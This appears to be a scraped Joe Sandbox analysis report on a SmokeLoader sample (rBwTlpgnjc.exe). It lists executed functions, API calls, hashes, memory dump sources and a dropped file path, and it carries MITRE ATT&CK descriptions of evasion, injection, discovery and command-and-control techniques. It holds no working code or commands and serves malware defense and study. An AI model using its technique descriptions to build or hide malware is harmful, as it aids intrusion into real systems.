Instruction Fuzzy Hash: 2D81AB31900209AFDF11DF94C845EAEBBB6FF48314F1481AAF91477291C739A961CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B856 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0040B87A

Part of subcall function 0040BF61: __fltout2.LIBCMT ref: 0040BF8A

__cftog_l.LIBCMT ref: 0040B8A0
__cftoe_l.LIBCMT ref: 0040B8D2

Memory Dump Source

Source File: 00000004.00000002.2296802517.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_ivfjsrs.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 546156d34ab6ee1089efc4ea19fc89f106c9727d11cbe4cec4e4add1c920c602
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 0D013D7700014AFBCF126E94CC418EE3F66FF18354B588426FA6869171D33AC9B1AB89

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ivfjsrsPID: 7092, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	21.9%
Signature Coverage:	0%
Total number of Nodes:	215
Total number of Limit Nodes:	10

Executed Functions

Function 05C6003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 05C6024D

Strings

cess, xrefs: 05C6018D
kernel32.dll, xrefs: 05C6008F, 05C60095

Memory Dump Source

Source File: 00000006.00000002.4451244629.0000000005C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c60000_ivfjsrs.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: b4f774dec7f8296483ca9c0085d20ef1f6401d36a4dca4719306c3aa2a2800dc
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: C6526874A01229DFDB64CF68C984BA8BBB1BF09304F1484D9E94DBB351DB30AA85DF15

Uniqueness

Uniqueness Score: -1.00%

Function 0040D47B Relevance: 3.0, APIs: 2, Instructions: 30
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,?,?,?,?,?,00000000,00000000,00000000,?,0040CC7E,?,?,00000000,?,00000000), ref: 0040D4A2
LCMapStringW.KERNEL32(00000000,?,?,?,?,?,?,0040CC7E,?,?,00000000,?,00000000,00000000), ref: 0040D4BF

Memory Dump Source

Source File: 00000006.00000002.4448924570.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_ivfjsrs.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 2ae232fb656378ce483d58b65c5ffb3af57457b4fba3747539c215fd1d4e99ef
Instruction ID: 570daf4adb4621a24a7f0c796f3d6176889b68d62c2a7a6e92a15093398afc95
Opcode Fuzzy Hash: 2ae232fb656378ce483d58b65c5ffb3af57457b4fba3747539c215fd1d4e99ef
Instruction Fuzzy Hash: 74F01F72010109BFDF069FD4ED0ACEB3B6AFB48354B048429FA1855061D776A971AB95

Uniqueness

Uniqueness Score: -1.00%

Function 05C60E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,05C60223,?,?), ref: 05C60E19
SetErrorMode.KERNELBASE(00000000,?,?,05C60223,?,?), ref: 05C60E1E

Memory Dump Source

Source File: 00000006.00000002.4451244629.0000000005C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c60000_ivfjsrs.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: f936fd5470bb6636453be33c34ffb0273aa79846dea28612e14fc2c1473532d2
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: BED0123154912877D7002A94DC0DBCD7B1CDF05B62F008411FB0DE9080C770964046E5

Uniqueness

Uniqueness Score: -1.00%

Function 0413CCBE Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Module32First.KERNEL32(00000000,00000224), ref: 0413CD06

Memory Dump Source

Source File: 00000006.00000002.4450918361.0000000004136000.00000040.00000020.00020000.00000000.sdmp, Offset: 04136000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4136000_ivfjsrs.jbxd

Yara matches

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: dd3d3761ba599af92c2a02c9885defcf84a1a185223d9d04f07e9968566fe9a8
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 5AF062371007116BD7202BB598CCBAAB6E8AF49726F100569E646B20C0EB70F8458AA1

Uniqueness

Uniqueness Score: -1.00%

Function 004018C2 Relevance: 1.3, APIs: 1, Instructions: 66
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Memory Dump Source

Source File: 00000006.00000002.4448887586.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ivfjsrs.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ff9f01ca4c393a08f76f6e5a838ed7a3d2660925920f57d41366f9cbdd6b62ca
Instruction ID: 4745c2705094581d0f5999afd28ebaee23fd0fd9cdaa7dedec1be42f8ab6d50d
Opcode Fuzzy Hash: ff9f01ca4c393a08f76f6e5a838ed7a3d2660925920f57d41366f9cbdd6b62ca
Instruction Fuzzy Hash: C3118FB224C205EBD7006AE49D91EAA7764AB01710F308137FA477A1F0D27D9A13F71B

Uniqueness

Uniqueness Score: -1.00%

Function 004018C3 Relevance: 1.3, APIs: 1, Instructions: 66
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Memory Dump Source

Source File: 00000006.00000002.4448887586.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ivfjsrs.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 672354b48b4500f80d7e3316d7c3cbb6db3200aabee133b507ba3e6b46ef9c0c
Instruction ID: 53cc65aa0172f3087033d362448bdc94b21a8511efdb665d8b99a9a355c9eb06
Opcode Fuzzy Hash: 672354b48b4500f80d7e3316d7c3cbb6db3200aabee133b507ba3e6b46ef9c0c
Instruction Fuzzy Hash: 5B114FB220C205EBD6006A949D92E6A3668AB01754F308137BA477A1F0D17D9A53F76B

Uniqueness

Uniqueness Score: -1.00%

Function 004018CE Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Memory Dump Source

Source File: 00000006.00000002.4448887586.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ivfjsrs.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 839399c0c5f771f145dcf59bf77482c10cae34aed270f924c99471655a6f096b
Instruction ID: c74ef3fd805783007b5872fe690244dae77f590db066df4350d3399cd1107ce2
Opcode Fuzzy Hash: 839399c0c5f771f145dcf59bf77482c10cae34aed270f924c99471655a6f096b
Instruction Fuzzy Hash: A211E9B2208205EBDB006BA0CC92FA93764AF01710F244177F6577A0F1D67D9A13EB1B

Uniqueness

Uniqueness Score: -1.00%

Function 004018ED Relevance: 1.3, APIs: 1, Instructions: 54
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Memory Dump Source

Source File: 00000006.00000002.4448887586.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ivfjsrs.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3d89ce9320b16bd182f6e0f70523ef1a230dfde452e476c137488484a014d7a9
Instruction ID: 5192c5fd7ad846daa7d68e837b6c6d3e663b4b5ca2644085206a245cacfb9c55
Opcode Fuzzy Hash: 3d89ce9320b16bd182f6e0f70523ef1a230dfde452e476c137488484a014d7a9
Instruction Fuzzy Hash: C80152B2208205EBDB006AD09D91F6A3364AF01714F308137BA17790F1D67D9A53F71B

Uniqueness

Uniqueness Score: -1.00%

Function 004018F4 Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Memory Dump Source

Source File: 00000006.00000002.4448887586.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ivfjsrs.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2781643a89c76b53395398b29c757f4b6a622ff20d524e454b014cf587dda4ad
Instruction ID: 6301a06c588b47d17a354cf59e3a00cdfa51c18b5066a88522684ebbc7f3c5b3
Opcode Fuzzy Hash: 2781643a89c76b53395398b29c757f4b6a622ff20d524e454b014cf587dda4ad
Instruction Fuzzy Hash: 3C0175B1248105EBDB006AE49D91FAE33546F05714F204133FA577A1F1D27D9913E76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401907 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Memory Dump Source

Source File: 00000006.00000002.4448887586.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ivfjsrs.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: fc479d8f8625d3ec0a4cfd76c356c3dcf65cd00e53a367061983570e5a5f091e
Instruction ID: ddfa02207d2976e6176cbc7aeabde5bcf8e04bb4bd45437ba787a0bf3f4ebc64
Opcode Fuzzy Hash: fc479d8f8625d3ec0a4cfd76c356c3dcf65cd00e53a367061983570e5a5f091e
Instruction Fuzzy Hash: D10171B1208205EBDB006AE4DD91F6A3364AF05714F204137FA577A0F0C27E9A53E72B

Uniqueness

Uniqueness Score: -1.00%

Function 0413C97D Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0413C9CE

Memory Dump Source

Source File: 00000006.00000002.4450918361.0000000004136000.00000040.00000020.00020000.00000000.sdmp, Offset: 04136000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4136000_ivfjsrs.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 699b8c96fe528ea2b33fbd24db015f658bc9b95266da78f0a77d5059c09a7c8d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 39110C79A00208EFDB01DF98C985E99BBF5AF08751F158094F948AB361E771EA50DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040B114 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 155COMMON

Download Yara Rule

APIs

FindHandlerForForeignException.LIBCMT ref: 0040B133
___FrameUnwindToState.LIBCMT ref: 0040B19C
RtlEncodePointer.NTDLL(00000000), ref: 0040B1D7

Strings

RCC, xrefs: 0040B1F4
MOC, xrefs: 0040B1EC
TEA, xrefs: 0040B166
LEA, xrefs: 0040B17E

Memory Dump Source

Source File: 00000006.00000002.4448924570.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_ivfjsrs.jbxd

Similarity

API ID: EncodeExceptionFindForeignFrameHandlerPointerStateUnwind
String ID: LEA$MOC$RCC$TEA
API String ID: 1036487854-2731589300
Opcode ID: 1a2bd6febaed6d2cf79add096828e36a246bb04c73bc044f33d159c1ebe0c176
Instruction ID: fde7f3cf3d54f177af3fd344ca719e7cdbfe60c4783f3b80faa380b6aa17e4eb
Opcode Fuzzy Hash: 1a2bd6febaed6d2cf79add096828e36a246bb04c73bc044f33d159c1ebe0c176
Instruction Fuzzy Hash: E651BE32500109AFDF11DF80CC45EAEB766EF84318F1881AEFA1476292C739AD60CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B001 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

___TypeMatch.LIBCMT ref: 0040B031
IsInExceptionSpec.LIBCMT ref: 0040B0DA
___FrameUnwindToState.LIBCMT ref: 0040B19C
RtlEncodePointer.NTDLL(00000000), ref: 0040B1D7

Strings

RCC, xrefs: 0040B1F4
MOC, xrefs: 0040B1EC

Memory Dump Source

Source File: 00000006.00000002.4448924570.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_ivfjsrs.jbxd

Similarity

API ID: EncodeExceptionFrameMatchPointerSpecStateTypeUnwind
String ID: MOC$RCC
API String ID: 2268674365-2084237596
Opcode ID: ab32939c3ea4cad5d0379ab34813940f09444cff58c9fdd57895ec532d556492
Instruction ID: fe3876bf30caa339d60e068b76d1540c14f00c9adcebcf3be3f80ea161fb876a
Opcode Fuzzy Hash: ab32939c3ea4cad5d0379ab34813940f09444cff58c9fdd57895ec532d556492
Instruction Fuzzy Hash: 2D81AB31900209AFDF11DF94C845EAEBBB6FF48314F1481AAF91477291C739A961CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B856 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0040B87A

Part of subcall function 0040BF61: __fltout2.LIBCMT ref: 0040BF8A

__cftog_l.LIBCMT ref: 0040B8A0
__cftoe_l.LIBCMT ref: 0040B8D2

Memory Dump Source

Source File: 00000006.00000002.4448924570.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_ivfjsrs.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 546156d34ab6ee1089efc4ea19fc89f106c9727d11cbe4cec4e4add1c920c602
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 0D013D7700014AFBCF126E94CC418EE3F66FF18354B588426FA6869171D33AC9B1AB89

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rBwTlpgnjc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\ivfjsrs

C:\Users\user\AppData\Roaming\ivfjsrs:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
rBwTlpgnjc.exe

Function 004013ED Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 310
nativeCOMMON

Function 004014E2 Relevance: 10.7, APIs: 7, Instructions: 183
nativeCOMMON

Function 004014ED Relevance: 10.7, APIs: 7, Instructions: 182
nativeCOMMON

Function 00401507 Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Function 00401518 Relevance: 10.7, APIs: 7, Instructions: 171
nativeCOMMON

Function 0040151C Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Function 0434B756 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0413003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 0040D47B Relevance: 3.0, APIs: 2, Instructions: 30
COMMONLIBRARYCODE

Function 04130E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004018C3 Relevance: 1.3, APIs: 1, Instructions: 66
sleepCOMMON

Function 004018CE Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Function 004018ED Relevance: 1.3, APIs: 1, Instructions: 54
sleepCOMMON

Function 004018F4 Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Function 00401907 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON